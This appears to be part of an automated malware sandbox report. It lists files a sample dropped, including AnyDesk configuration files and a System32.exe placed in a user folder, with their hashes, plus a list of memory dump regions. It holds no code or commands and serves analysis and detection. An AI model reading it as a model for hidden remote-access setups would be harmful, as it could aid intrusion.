SHA51227393736905758e7140bf664bb256ff8e9bb209bcabf984030a4dc8697cb6bc4388b67c3fbf579c7e2ac57513122a4cbd30cba4928762450d081f8664c019c52
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD540528f21e62ac55b45b89c31cef94b34
SHA16d6f5d19397f9fbeb71c661261066268b8a0111b
SHA256f312cec5d5a9e227285d82a09e4002c827b58b18b7aa4c9477485cc4ce479dbc
SHA512679b8be2049b9e3642295f9b39f66544ecd02d03160d86cf40b8290e4723187a9f108e71bd005d6eaeebe724d251e4828b152f33df870687d30d23b6877fd33a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD521017c68eaf9461301de459f4f07e888
SHA141ff30fc8446508d4c3407c79e798cf6eaa5bb73
SHA25603b321e48ff3328d9c230308914961fe110c4c7bc96c0a85a296745437bcb888
SHA512956990c11c6c1baa3665ef7ef23ef6073e0a7fcff77a93b5e605a83ff1e60b916d80d45dafb06977aed90868a273569a865cf2c623e295b5157bfff0fb2be35d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5d8f32fd3fbbbb87ea88ed7b823adc7eb
SHA17992e16e92f146bddc925b6c0decbcc23b6f17bd
SHA256655e240fcfd9da5958966e13cb5dbaa2541baf937bb08fc0799899ff8f5d47dc
SHA5121722912ff5f39260bd835ac7d9203dc0306218ddd1b6026ecd839aceb772bdd8e1a961e740a95cd4aa776ff4ade4585067f48240a858c4460e343320b07e9364
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5051a74485331f9d9f5014e58ec71566c
SHA14ed0256a84f2e95609a0b4d5c249bca624db8fe4
SHA2563f67e4ba795fd89d33e9a1fe7547e297a82ae50b8f25eedc2b33a27866b28888
SHA5121f15fd8ca727b198495ef826002c1cbcc63e98eecb2e92abff48354ae668e6c3aaf9bd3005664967ae75637bacee7e730ce36142483d08ae6a068d9ae3e0e17d
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gtdh25u4.hfk.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.traceFilesize
28KB
MD52602eb05dd419b7f8a1fcac13c5d6ac2
SHA1156853e5c482fbdae973858429797aa993ee7220
SHA256818bf9e627b6f7e79efb1600166a4abcc0752338f540b580e57cd0c46c5a78a2
SHA51257cb235276eddc22a9dd22d5050f0938602d8bbc5e7f2af7d55f489d3ffc3a42779c8698fc1a55e3b981805183e79db3c1fc46b686f266043473fa82b6f6ba84
-
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.traceFilesize
32KB
MD5524d62d99f1439139774e013417fedeb
SHA13843cafa4ed8c7f883048ff4436c6923107ccdb0
SHA25635f893aa1c933d61f09502cd2f6cf449cc3d54a45a53cab7f21c1741720d74b5
SHA5120ba350e9cdde8033050e894c058b2733c4a47dfa8259e5e0abb5e190818fd85e2b655408f016232f1170a253e7eece10dc77de06d3d8ace41da4fc4149e7b0d3
-
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.traceFilesize
38KB
MD5845213cee4ad06db3363e2893ace3d88
SHA16583940eb951e070bfd51927ace369b08dfcc4c4
SHA2562c3809eaeec78bfa7f364882b1d1013ba16baa75c3e955dfe36daaa370a0233a
SHA51213109adc897a2d905b3cccc5144348c8fb256cefa97afdc2320519eeee6a86d46680d218433c7a2d29c3818c0cdd3e499e550f4d9dac97e09355d5fa0ee4e3ca
-
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.traceFilesize
8KB
MD5fdd4b4ef5baabfd2d6ad6efb6165802a
SHA1ccab8b13616f82e11b8796bf675bc7450ba071dc
SHA2568de59f3fd660ec549fc727cacc4028051706b9ba8fc7a2e867eaf0711e98a440
SHA512f06702ee3ff985e90b5f7a90b19f170960b8cf9e0e9f8b14eeb26ae9a7d665012da24ca2202389cb980719297eb3513e23573d3e090adcfffbc690c0c65b9c96
-
C:\Users\Admin\AppData\Roaming\AnyDesk\service.confFilesize
2KB
MD5a1febfd0d7250ff544e9571a2455797c
SHA18e48d6c88aa4b86f57c52f27f3a3f31ec8168a2d
SHA256922235df26ba159df9337f9126a83566c3426459759b2e9a36038d4708c9fd5b
SHA512e20dfc595e21256b6600f414e9bfa0a79efa030b04b8169a3bc3b342727b6c726fb499acb8cc42bf9777faa6a47aae2044f88764c8039913e825586be603adc3
-
C:\Users\Admin\AppData\Roaming\AnyDesk\system.confFilesize
424B
MD58d320d56839fd5b0cc0d4743f69e5c7a
SHA1d21c6c350072d63270b06a780108b80d06500830
SHA2567f24ff661cb9fd8efc824684daff043bf2eeebafe36a066eb4c8ff8c25faac07
SHA5120b4f557c92fe43e1e61c7afae557054892ef08c7fa0bf6cb252dcb7b0bdc805008351d8bbf0cec55a7492ef37c9e4796501ff772d9e405541f1dc4c03a0f0ffd
-
C:\Users\Admin\AppData\Roaming\AnyDesk\system.confFilesize
632B
MD553431d0c8ae79ed5d32e619cd10ce1a6
SHA1a25536ebc439995f5f35521322451f480ad54d72
SHA256f8ec6b7120e75a5897c82fa849ad89fa2e48763e7e06aed77b6e8136d021dd59
SHA51240edc010367548878d20189c0d630ff986c9e953fbb8fc75845303b3aec263f9f94d372ff708590fe180f2a8a7340734aa2d5f37f7d8277e1abb2212d56f34d1
-
C:\Users\Admin\AppData\Roaming\AnyDesk\system.confFilesize
312B
MD50c04ad1083dc5c7c45e3ee2cd344ae38
SHA1f1cf190f8ca93000e56d49732e9e827e2554c46f
SHA2566452273c017db7cbe0ffc5b109bbf3f8d3282fb91bfa3c5eabc4fb8f1fc98cb0
SHA5126c414b39bbc1f1f08446c6c6da6f6e1ceb9303bbf183ae279c872d91641ea8d67ec5e5c4e0824da3837eca73ec29fe70e92b72c09458c8ce50fa6f08791d1492
-
C:\Users\Admin\AppData\Roaming\AnyDesk\user.confFilesize
1KB
MD5a1908800919718602641b8db4ea29f9b
SHA1172d04fb65d1cc12b24187b435ad79cd028c1972
SHA25648b737441db0bff16f8f6dcf4e60b690268d022af8c77d246d84dd740fef039b
SHA5127c6f3b7bd80e7a61f996c996a3500f96c180115d8ab41393c081fc8253f1c93e5263a449ec500d34aa06d5e6e8d99b0f9b61019d6cea596868a1195b4c7de7f4
-
C:\Users\Admin\AppData\Roaming\AnyDesk\user.confFilesize
5KB
MD5e570d6c1d6b000d7ef8a6aef2301b312
SHA16385fbb1ed8ffd9afbb753228a7919a16563efbb
SHA25690bc238cbce527c3a54e2ae92ab04c01b9cc0de244f8fa3dabab8eeb362845d5
SHA5126594c5fc070a1c520a162512fea1efc45f6608c274ba92e9e1569664d575e8b52e0732c7ec2185af2c45638a49f803161ba54e9c3da5171250573c628248d899
-
C:\Users\Admin\AppData\Roaming\AnyDesk\user.confFilesize
5KB
MD5df7999c4d6fedd772d40eb50e6caebba
SHA1e9b016fe140480ffa84535e87d12a19f360c8518
SHA256eb0a49cdf446faf225290bf5dbc820a58cc734c77dcb012d1b934e3585720019
SHA51266c76b68afd972fc7f1a865b2c985f58f7330a8ac86d8ba2043981120190c8753306c608618737d9878a92a8e994f080e284331d3df31da78ac728b9c8e26c04
-
C:\Users\Admin\AppData\Roaming\AnyDesk\user.confFilesize
41B
MD5a787c308bd30d6d844e711d7579be552
SHA1473520be4ea56333d11a7a3ff339ddcadfe77791
SHA2568a395011a6a877d3bdd53cc8688ef146160dab9d42140eb4a70716ad4293a440
SHA512da4fcf3a3653ed02ee776cfa786f0e75b264131240a6a3e538c412e98c9af52c8f1e1179d68ed0dd44b13b261dc941319d182a16a4e4b03c087585b9a8286973
-
C:\Users\Admin\System32.exeFilesize
121KB
MD55c76d15a7d3f57f26edc494bd9db318b
SHA1cfa089d8d7e9fde67b6cb85827d33431b2d80066
SHA256af872e954905dbfeb165da42d722889a7dfc4b84e88b52c9abc9de18a1a9d74f
SHA5123d7a621dcb56a8d8ded08e49c34c77071bcb8e8f408acd2ec9c00ff887342d1e3be935f3ad56b33ef7a96d0d85e1e36b6cccc9498a2b0fe96dab7b5d5747c1fb
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/832-299-0x00000000007E0000-0x0000000001F29000-memory.dmpFilesize
23.3MB
-
memory/960-0-0x00007FFDD7243000-0x00007FFDD7245000-memory.dmpFilesize
8KB
-
memory/960-56-0x00007FFDD7240000-0x00007FFDD7D02000-memory.dmpFilesize
10.8MB
-
memory/960-1-0x0000000000CB0000-0x0000000000CD8000-memory.dmpFilesize
160KB
-
memory/960-55-0x000000001D580000-0x000000001DAA8000-memory.dmpFilesize
5.2MB
-
memory/960-53-0x00007FFDD7240000-0x00007FFDD7D02000-memory.dmpFilesize
10.8MB
-
memory/960-54-0x000000001CDA0000-0x000000001CE50000-memory.dmpFilesize
704KB
-
memory/1008-12-0x00007FFDD7240000-0x00007FFDD7D02000-memory.dmpFilesize
10.8MB
-
memory/1008-13-0x00007FFDD7240000-0x00007FFDD7D02000-memory.dmpFilesize
10.8MB
-
memory/1008-14-0x00007FFDD7240000-0x00007FFDD7D02000-memory.dmpFilesize
10.8MB
-
memory/1008-7-0x00000176DEA80000-0x00000176DEAA2000-memory.dmpFilesize
136KB
-
memory/1008-11-0x00007FFDD7240000-0x00007FFDD7D02000-memory.dmpFilesize
10.8MB
-
memory/1008-17-0x00007FFDD7240000-0x00007FFDD7D02000-memory.dmpFilesize
10.8MB
-
memory/1092-379-0x00000000007E0000-0x0000000001F29000-memory.dmpFilesize
23.3MB
-
memory/1092-320-0x00000000007E0000-0x0000000001F29000-memory.dmpFilesize
23.3MB
-
memory/1092-337-0x00000000007E0000-0x0000000001F29000-memory.dmpFilesize
23.3MB
-
memory/1332-284-0x00000000007E0000-0x0000000001F29000-memory.dmpFilesize
23.3MB
-
memory/1332-273-0x00000000007E0000-0x0000000001F29000-memory.dmpFilesize
23.3MB
-
memory/1912-84-0x00000000004E0000-0x0000000001C29000-memory.dmpFilesize
23.3MB
-
memory/1912-174-0x00000000004E0000-0x0000000001C29000-memory.dmpFilesize
23.3MB
-
memory/3376-173-0x00000000004E0000-0x0000000001C29000-memory.dmpFilesize
23.3MB
-
memory/3376-83-0x00000000004E0000-0x0000000001C29000-memory.dmpFilesize
23.3MB
-
memory/3384-345-0x00000000007E0000-0x0000000001F29000-memory.dmpFilesize
23.3MB
-
memory/3384-285-0x00000000007E0000-0x0000000001F29000-memory.dmpFilesize
23.3MB
-
memory/3384-335-0x00000000007E0000-0x0000000001F29000-memory.dmpFilesize
23.3MB
-
memory/3384-313-0x00000000007E0000-0x0000000001F29000-memory.dmpFilesize
23.3MB
-
memory/3384-181-0x00000000007E0000-0x0000000001F29000-memory.dmpFilesize
23.3MB
-
memory/3948-223-0x00000000004E0000-0x0000000001C29000-memory.dmpFilesize
23.3MB
-
memory/3948-75-0x00000000004E0000-0x0000000001C29000-memory.dmpFilesize
23.3MB
-
memory/4564-310-0x000001A2CB540000-0x000001A2CBCE6000-memory.dmpFilesize
7.6MB
-
memory/4564-309-0x000001A2CA160000-0x000001A2CA322000-memory.dmpFilesize
1.8MB
-
memory/4920-336-0x00000000007E0000-0x0000000001F29000-memory.dmpFilesize
23.3MB
-
memory/4920-227-0x00000000007E0000-0x0000000001F29000-memory.dmpFilesize
23.3MB
-
memory/4920-286-0x00000000007E0000-0x0000000001F29000-memory.dmpFilesize
23.3MB
-
memory/4920-380-0x00000000007E0000-0x0000000001F29000-memory.dmpFilesize
23.3MB